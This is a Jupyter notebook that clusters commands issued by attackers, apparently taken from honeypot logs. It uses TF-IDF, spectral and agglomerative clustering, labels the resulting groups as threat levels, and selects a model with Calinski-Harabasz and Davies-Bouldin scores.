# First Clustering Stage
This notebook contains the code to create the first stage in data clusterization. Here we deal with Spectral Clustering and Agglomerative Clustering in order to create labels of our data using the commands emulated by the cyberattackant. Metrics such as Davies-Bouldin Index and Calinski-Harabasz score are used to perform model selection.

In [None]:
# Required imports 

# Utils functions
from utils import *

# Ignore warnings
import warnings
warnings.filterwarnings('ignore')

# General imports 
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from collections import Counter
import seaborn as sns
from prettytable import PrettyTable

# ML imports
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.cluster import SpectralClustering
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import calinski_harabasz_score
from sklearn.metrics import davies_bouldin_score

# Dimensionality reduction
import umap
import plotly.express as px

## Spectral Clustering

Clustering from a similarity matrix. 

### Similarity matrix
Computation of cosine similarity matrix from a tf-idf vectorizer of the unique commands.

In [None]:
# Read csv file
df = pd.read_csv("../Data/Cluster_data.csv")
# Just take the commands feature
df_commands = df[['_source.commands']]
# Unique commands
print('Number of unique commands in the dataset:', df_commands['_source.commands'].nunique())

Since we have to many unique commands, let us proceed with a "command normalization" to reduce the dimensionality.

In [None]:
# Command normalization
df_commands = command_normalization(df_commands)
print('Number of unique commands in the processed dataset:', df_commands['_source.commands'].nunique())

Reduction of unique commands from 158436 to 3299. Let us proceed with the tf-idf vectorizer and the cosine similarity matrix.

In [None]:
# Identify the unique commands
unique_commands = df_commands['_source.commands'].unique()

# Create a TF-IDF vectorizer and compute the TF-IDF matrix for the unique commands
tfidf_vectorizer = TfidfVectorizer()
tfidf_matrix = tfidf_vectorizer.fit_transform(unique_commands)
print('Tf-idf vectorization done!')

# Compute the cosine similarity between the unique commands
cosine_sim_matrix = cosine_similarity(tfidf_matrix,tfidf_matrix,dense_output=True)
print('Similarity matrix computed!') 

### Random walk normalized Laplacian. Optimal number of clusters
This matrix will help us to choose the optimal number of clusters for the Spectral Clustering algortihm.

In [None]:
# Compute Laplacian
L_rw = compute_Lrw(cosine_sim_matrix)

# Calculate the eigenvalues of L_rw
eigenvalues = np.linalg.eigvals(L_rw)

# Sort the eigenvalues in ascending order
sorted_eigenvalues = np.sort(eigenvalues)[:20]

# Plot the first 20 eigenvalues
plt.figure(figsize=(10, 6))
plt.plot(sorted_eigenvalues, marker='o', linestyle='')
plt.xlabel("Eigenvalue Index")
plt.ylabel("Eigenvalues")
plt.grid(True)
plt.show()

Eigengap heuristic. There first three eigenvalues are approximately 0. Then, there is a gap between the 3th and 4th eigenvalue, that is $|\lambda_3 - \lambda_4|$ is relatively large. According to the eigengap heuristic, this gap indicates that the data set contains 3 clusters.

### Model

In [None]:
# Spectral clustering algorithm
spectral_clustering = SpectralClustering(n_clusters=3, affinity='precomputed', random_state=42)
spectral_labels = spectral_clustering.fit_predict(cosine_sim_matrix)

### Clustering visualization

In [None]:
# Map the computed clusters to the whole dataframe

# Create an empty dictionary for mapping
commands_to_cluster = {}

# Iterate through commands and cluster labels to create the mapping
for command, cluster in zip(unique_commands, spectral_labels):
    commands_to_cluster[command] = cluster

# Mapping commands to each cluster
def map_commands_to_cluster(command):
    return commands_to_cluster.get(command, None)

df['spectral_cluster'] = df_commands['_source.commands'].apply(map_commands_to_cluster)

In [None]:
# Clustering distribution for unique commands
label_counts = Counter(spectral_labels)
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)

# Set the x-ticks to show 1, 2, and 3
ax.set_xticks([1, 2, 3])
# Show the plot
plt.tight_layout()
plt.show()


In [None]:
# Clustering distribution for the whole dataset
label_counts = Counter(df['spectral_cluster'])
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Millions variable
ax.set_yticklabels(['{:.0f}M'.format(y/ 1e6) for y in ax.get_yticks()])

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only 1, 2, and 3
ax.set_xticks([1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()


In [None]:
# UMAP embedding
reducer = umap.UMAP(metric='cosine', random_state=42)
embedding = reducer.fit_transform(tfidf_matrix)

# Create a scatter plot with better aesthetics
plt.figure(figsize=(8, 6))
scatter = plt.scatter(embedding[:, 0], embedding[:, 1], c=spectral_labels, cmap='viridis', s=35, edgecolors='w', linewidth=0.5, alpha=0.7)

# Add labels and title
plt.xlabel('UMAP Dimension 1', fontsize=10)
plt.ylabel('UMAP Dimension 2', fontsize=10)

# Customize the grid and ticks
plt.grid(False)
plt.xticks([])
plt.yticks([])

plt.show()


In [None]:
# 3D scatterplot
reducer = umap.UMAP(metric='cosine',n_components=3, random_state = 42) 
embedding = reducer.fit_transform(tfidf_matrix) 
fig = px.scatter_3d(
    embedding, x=0, y=1, z=2, color=spectral_labels, size=0.1*np.ones(len(unique_commands)), opacity = 1,
    title='UMAP plot in 3D',
    labels={'0': 'comp. 1', '1': 'comp. 2', '2': 'comp. 3'},
    width=750, height=600,
    color_continuous_scale = 'Viridis'
)
fig.show()

Show the clusters:

In [None]:
# Create the list, one per each cluster
cluster_0 = []  
cluster_1 = []  
cluster_2 = []  

for key, value in commands_to_cluster.items():
    if value == 0:
        cluster_0.append(key)
    elif value == 1:
        cluster_1.append(key)
    else:
        cluster_2.append(key)

In [None]:
cluster_0

In [None]:
cluster_1

In [None]:
cluster_2

**Conclusion:** Spectral cluster gives as a classification by threat levels.
+ Cluster 0: Commands as uname, echo -e, etc -->display system information. Generally removing and creating new files. Scanning cluster.
+ Cluster 1: Commands to start a terminal session, move and create files and sometimes download suspicious files to the system.
+ Cluster 2: Commands to donwload and in most of the cases execute with permissions files (wget and chmod).

These clusters monitor the threat levels as attackers infiltrate the targeted system. Cluster 0, categorized as level 1, poses the lowest threat, primarily performing system scans and extracting information. Cluster 1, designated as level 2, not only displays system information but may occasionally attempt to download files. Lastly, cluster 2, which corresponds to level 3, represents the highest threat level, consistently attempting to download and execute external files, potentially with malicious software.

## Agglomerative Clustering
Clustering from a similarity matrix. By the previous reasoning, 3 clusters seems a good approach. Let us taste it with another clustering algorithm.

The Agglomerative Clustering do not directly accept the similarity matrix as an input, but we can consider a distance matrix instead (dissimilarity matrix).

In [None]:
# Agglomerative clustering with similarity matrix

# Compute distance matrix
distance_matrix = 1-cosine_sim_matrix

# Create an AgglomerativeClustering model with three clusters(as before)
agg_clustering = AgglomerativeClustering(n_clusters=3, linkage='complete', metric='precomputed')

# Fit and predict the model with the distance matrix
agg_clustering.fit(distance_matrix)

### Clustering visualization

In [None]:
# Clustering distribution for unique commands
label_counts = Counter(agg_clustering.labels_)
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only 1, 2, and 3
ax.set_xticks([1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# UMAP embedding
reducer = umap.UMAP(metric='cosine', random_state=42)
embedding = reducer.fit_transform(tfidf_matrix)

# Create a scatter plot with better aesthetics
plt.figure(figsize=(8, 6))
scatter = plt.scatter(embedding[:, 0], embedding[:, 1], c=agg_clustering.labels_, cmap='viridis', s=35, edgecolors='w', linewidth=0.5, alpha=0.7)

# Add labels and title
plt.xlabel('UMAP Dimension 1', fontsize=10)
plt.ylabel('UMAP Dimension 2', fontsize=10)

# Customize the grid and ticks
plt.grid(False)
plt.xticks([])
plt.yticks([])

plt.show()


In [None]:
# 3D scatterplot
reducer = umap.UMAP(metric='cosine',n_components=3, random_state = 42) 
embedding = reducer.fit_transform(tfidf_matrix) 
fig = px.scatter_3d(
    embedding, x=0, y=1, z=2, color=agg_clustering.labels_, size=0.1*np.ones(len(unique_commands)), opacity = 1,
    title='UMAP plot in 3D',
    labels={'0': 'comp. 1', '1': 'comp. 2', '2': 'comp. 3'},
    width=650, height=500,
    color_continuous_scale = 'Viridis'
)
fig.show()

Just with the visualization one can observe that this model seems less consisting than the previous one.

## Model selection
Use of Davies-Bouldin index and Calisnki-Harabasz index for model selection.

In [None]:
# Calinski-Harabasz index
spectral_ch = calinski_harabasz_score(tfidf_matrix.toarray(),spectral_labels)
agg_ch = calinski_harabasz_score(tfidf_matrix.toarray(),agg_clustering.labels_)

# Davies-Bouldin index
spectral_db = davies_bouldin_score(tfidf_matrix.toarray(),spectral_labels)
agg_db = davies_bouldin_score(tfidf_matrix.toarray(),agg_clustering.labels_)

# Create a table
table = PrettyTable()
table.field_names = ["Metric", "Spectral Clustering", "Agglomerative Clustering"]

# Add your metrics to the table
table.add_row(["Calinski-Harabasz Score", spectral_ch, agg_ch])
table.add_row(["Davies-Bouldin Index", spectral_db, agg_db])

# Print the table
print(table)

Spectral clustering shows better results!!

In [None]:
# Save dataframe with labels
df.to_csv("../Data/Cluster_data_wlabels.csv",index=False)